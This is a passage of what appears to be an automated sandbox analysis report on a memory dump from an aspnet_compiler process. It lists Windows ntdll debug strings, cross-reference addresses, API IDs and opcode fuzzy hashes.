                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A41028
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A40FE5
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A410AE
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A4106B
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              Strings
                                                              • apphelp.dll, xrefs: 01A02462
                                                              • LdrpDynamicShimModule, xrefs: 01A4A998
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A4A992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A4A9A2
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              Strings
                                                              • HEAP[%wZ]: , xrefs: 019F3255
                                                              • HEAP: , xrefs: 019F3264
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 019F327D
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              Strings
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              Strings
                                                              • String ID: $@
                                                              Strings
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              Strings
                                                              • Failed to allocated memory for shimmed module list, xrefs: 01A4A10F
                                                              • LdrpCheckModule, xrefs: 01A4A117
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A4A121
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              Strings
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              Strings
                                                              • Failed to reallocate the system dirs string !, xrefs: 01A582D7
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 01A582DE
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A582E8
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              Strings
                                                              • @, xrefs: 01A9C1F1
                                                              • PreferredUILanguages, xrefs: 01A9C212
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A9C1C5
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              Strings
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              Strings
                                                              • LdrpCheckRedirection, xrefs: 01A6488F
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A64888
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01A64899
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              Strings
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 01A620FA
                                                              • Process initialization failed with status 0x%08lx, xrefs: 01A620F3
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A62104
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              Strings
                                                              • LdrResSearchResource Exit, xrefs: 019EAA25
                                                              • LdrResSearchResource Enter, xrefs: 019EAA13
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              Strings
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019E063D
                                                              • kLsE, xrefs: 019E0540
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 019EA2FB
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 019EA309
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: O:z`$O:z`(
                                                              • API String ID: 0-1361314060
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: O:z`(
                                                              • API String ID: 0-2318995099
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A6895E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fef668851bb49ecfe816bc26fe58f15f60ce6cc729d3a32869bb750a3bd8c92
                                                              • Instruction ID: 9804d2630162c1ce0f525fa09770207f49dafa99bfc702b95d307212fa48c83a
                                                              • Opcode Fuzzy Hash: 7fef668851bb49ecfe816bc26fe58f15f60ce6cc729d3a32869bb750a3bd8c92
                                                              • Instruction Fuzzy Hash: 27427F75E002199FEB25CF69CC45BADBBF5BF48301F188099E949EB242D7389A85CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c7e00fbe715353f870dcbccfe9dc25283ec415df3f8c15d4f490cbc1cb02fc4
                                                              • Instruction ID: c712f55841837e668c9cea9245978a7be1c08bdd00e2331d761ae97a665d5b2f
                                                              • Opcode Fuzzy Hash: 6c7e00fbe715353f870dcbccfe9dc25283ec415df3f8c15d4f490cbc1cb02fc4
                                                              • Instruction Fuzzy Hash: 3832FE74A007558BEB29CF69C944BBEBBF2BFC6300F24411DD58E9B285D735A846CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 697365dd014c1ddd5dbe802f463faf57eb0c0798e5b446aa5db57b4aad1e0ef8
                                                              • Instruction ID: 5bbce8c0c2623d2ed1f970f77804ceb087e15a9aaa6aa3f1957191763ef35709
                                                              • Opcode Fuzzy Hash: 697365dd014c1ddd5dbe802f463faf57eb0c0798e5b446aa5db57b4aad1e0ef8
                                                              • Instruction Fuzzy Hash: 3D22BF742046618BEB25EF2DC094772BBF1AF44304F08845BEA97CF286E775E492DB60
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7437abc2ff96f1dfbe711baee3238ee18508ff5874d08b1c66942d28994932b0
                                                              • Instruction ID: fb33fed558dc29f945937b88c05c8ab4010ab897a9c1677debe96b84a36bf4b9
                                                              • Opcode Fuzzy Hash: 7437abc2ff96f1dfbe711baee3238ee18508ff5874d08b1c66942d28994932b0
                                                              • Instruction Fuzzy Hash: 1B226270E00116DBCF16CFA9D4809BEFBF6BF94714B18805AE9459B242E778ED41CBA4
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 631a6aa9568812a2e29633e8538270fd0f5151aa39a2faf53f2e791352c1194e
                                                              • Instruction ID: 78137e66517edf6c427f7ae9046e6c31a27cd4b5ee20d5745a2dcb204d8efa46
                                                              • Opcode Fuzzy Hash: 631a6aa9568812a2e29633e8538270fd0f5151aa39a2faf53f2e791352c1194e
                                                              • Instruction Fuzzy Hash: A932A071A04205CFDB26CF68C584BAABBF5FF98310F144969E95AAB392D734F841CB50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction ID: 6e489795fb7e5fb4d4d9e0652139778e4009606e53a8e03584a6eaf20dd19367
                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction Fuzzy Hash: D3F13171E0061A9FDF16CF99E590BAEBBF5BF48710F098129EA05AB381D774D841CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0dae52124b78a384156631f9f5f84198fcf81e5a97f2041aa54e1f21fc934baa
                                                              • Instruction ID: 4f000f4f8c706889d476a1b537ee5ee48969c3ac1ffce57bb600a1bc5a3dd2c8
                                                              • Opcode Fuzzy Hash: 0dae52124b78a384156631f9f5f84198fcf81e5a97f2041aa54e1f21fc934baa
                                                              • Instruction Fuzzy Hash: 5CD1FE71E0060A9BDF05CF69CC45ABEBBF1AF88304F198169D955E7241E73DEA05CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d644f2eb7bf86fa2ecf596b20597a56a64b8af8855df6dc4fe1a3cd0e7bc9c73
                                                              • Instruction ID: 253e7ceca80dbbf5723c220c3a4aa9b868b705926be5dbf08949a5a6f6bcd355
                                                              • Opcode Fuzzy Hash: d644f2eb7bf86fa2ecf596b20597a56a64b8af8855df6dc4fe1a3cd0e7bc9c73
                                                              • Instruction Fuzzy Hash: 58E19C71608342CFC716CF2CC494A6ABBE4FF99314F058A6DE99987351EB31E905CB92
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 448dd7b6e8efb9e4e15eeecc6600e1940c5c22c3bcc00e39661711ac7fc342f0
                                                              • Instruction ID: 103075e668d6e13b70892ba616f7fc58b77852d54bcfcff415d2374e70f01fe6
                                                              • Opcode Fuzzy Hash: 448dd7b6e8efb9e4e15eeecc6600e1940c5c22c3bcc00e39661711ac7fc342f0
                                                              • Instruction Fuzzy Hash: A9D1E271A002069BDB14DF68C881FBAB7B5FF94714F05862DF91ADB282E734D951CB60
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction ID: 558fb0416c518376d14419b7c16b1fbb06b94c1fea8bfa84c9d52c63b60d2a4d
                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction Fuzzy Hash: D0B16F74A00709AFDF24DFA9C940AABBBBDFF84304F14446DAA5297795DA38E905CB10
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: 90b25d206524194a849f0cc4aa5fe54ffe21494be4775216ae338d5862d84c07
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: E4B11731600646AFDB21DB68C854BBEBBFBAFC8300F184599E656D7282D730ED41CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5550495d7e6d57d69f97d10e990d2c79bb1261659d5d8ec5b83b3fd9ab29bc3b
                                                              • Instruction ID: 76bcb59be9a98158759d9c1d8c6162e7902c043f925abcd57ff0abf1758f7fc2
                                                              • Opcode Fuzzy Hash: 5550495d7e6d57d69f97d10e990d2c79bb1261659d5d8ec5b83b3fd9ab29bc3b
                                                              • Instruction Fuzzy Hash: 12C18B70E0021ADFDB26CFA9D984BEEBBB5FF88344F14412DE506AB285D770A941CB40
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fe9fd3c770303e54ccc6540c32e9781f6aa4baeb5f627c46e10df0840b09da3
                                                              • Instruction ID: 21f8b1cef04b8a082145253ad4c896ca26ec635e538a73236f3b47963a3ec237
                                                              • Opcode Fuzzy Hash: 7fe9fd3c770303e54ccc6540c32e9781f6aa4baeb5f627c46e10df0840b09da3
                                                              • Instruction Fuzzy Hash: D8C158742083418FE765CF19C484BABB7E8FF88704F44496DE98987291EB74E948CF92
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3476c9aefe177a35a58a79e52f72dffb90070b086d1651d0cbe54ade36be00f
                                                              • Instruction ID: 30808c129744701726177ad6d22bd97c8102a94e3f992293f1655f27fdb1a74c
                                                              • Opcode Fuzzy Hash: a3476c9aefe177a35a58a79e52f72dffb90070b086d1651d0cbe54ade36be00f
                                                              • Instruction Fuzzy Hash: F7B17F70A042668BDB25CF68C990BA9B3B5EF84710F44C5EDD54EE7281EB309D86CF20
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 87a629e8155aefa73a09ff2faaa3e7f2914d374348ad2c64d43534cef5a0bd62
                                                              • Instruction ID: 33896f77932e1ad54418810aa64c4c72a39528b9d3adacc7df0287c5ff7b5d4d
                                                              • Opcode Fuzzy Hash: 87a629e8155aefa73a09ff2faaa3e7f2914d374348ad2c64d43534cef5a0bd62
                                                              • Instruction Fuzzy Hash: B2A13531E00619AFEB22DBACE944FAEBBB4EF41714F090525EA01AB2D1D7749D41CBD1
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a6cf233be6e99d4981159d7651d60a1d054fe21fba2c4a78148063786fbd810
                                                              • Instruction ID: 90cd06ffb3116cde82ae4fea11cd7be9daa134f34e75dfeeac1b656009a9fa7e
                                                              • Opcode Fuzzy Hash: 2a6cf233be6e99d4981159d7651d60a1d054fe21fba2c4a78148063786fbd810
                                                              • Instruction Fuzzy Hash: 15A1C170B01626DFDB25CF6DC690BAAB7B5FF54314F04412AFA059B682DB34E815CB50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26baf12d08ff472ffc806050ddd0e46112df1bd384f2cf179d1f9cb592f12662
                                                              • Instruction ID: c3fe88464d2f48bb9e1c70460dc0a013c9b3ce9ac4971529ac195c56859b05b0
                                                              • Opcode Fuzzy Hash: 26baf12d08ff472ffc806050ddd0e46112df1bd384f2cf179d1f9cb592f12662
                                                              • Instruction Fuzzy Hash: 3FA1D172A04692EFD712DF58C980B9ABBE9FF48704F05052CE54A9B652D334ED41CB91
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99ab13922a360efb928dd275dcdeb56f2b2a501524759571d4a0d9891722f81f
                                                              • Instruction ID: 7a2c952fc162462e01cd701d8b3a5ee92884c2c26b5dfcf49492f4c2866e8a7c
                                                              • Opcode Fuzzy Hash: 99ab13922a360efb928dd275dcdeb56f2b2a501524759571d4a0d9891722f81f
                                                              • Instruction Fuzzy Hash: C6918171D00216AFDB15CFA9D894BAEBFB9AF48710F154169E618EB341D734EA009BA0
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89770f7cc83ca20d3213cde8e1eb2099fec943c8006036b86f2a21108cb54fde
                                                              • Instruction ID: 7bbac6b0b99520bb143d57ac0dd2d9019e54c12dcfa62fb2d82b3fcb72c08d28
                                                              • Opcode Fuzzy Hash: 89770f7cc83ca20d3213cde8e1eb2099fec943c8006036b86f2a21108cb54fde
                                                              • Instruction Fuzzy Hash: 50913535A00616EBEB25DB5CC484B7EBBA1EF88B14F06446DEB09DB3A1E634D901C751
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00e408b709f5ce90f503b9a64d09518ebfee1868424abc638fec2dd954489e0d
                                                              • Instruction ID: 8765ee913356950fa2b91dabd9fbfa739e852bbd1c6cf3a9e380f7c06ff9379d
                                                              • Opcode Fuzzy Hash: 00e408b709f5ce90f503b9a64d09518ebfee1868424abc638fec2dd954489e0d
